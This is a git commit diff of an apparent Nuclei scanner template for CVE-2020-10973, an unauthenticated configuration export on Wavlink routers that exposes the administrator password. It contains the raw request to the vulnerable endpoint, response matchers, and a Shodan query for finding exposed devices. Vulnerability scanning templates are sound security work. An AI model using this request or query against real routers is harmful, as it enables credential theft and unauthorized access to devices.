Update CVE-2020-10973.yaml
parent
f4e7fc7817
commit
c6df6b3bc4
|
@ -7,11 +7,11 @@ info:
|
|||
description: |
|
||||
An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10973
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-10973
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"WN551K1"
|
||||
verified: "true"
|
||||
tags: access,control,cve,2020
|
||||
tags: cve,cve2020,access,control,wavlink
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -19,14 +19,13 @@ requests:
|
|||
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'url=/backupsettings.dat'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'url=/backupsettings.dat'
|
||||
|
|
Loading…
Reference in New Issue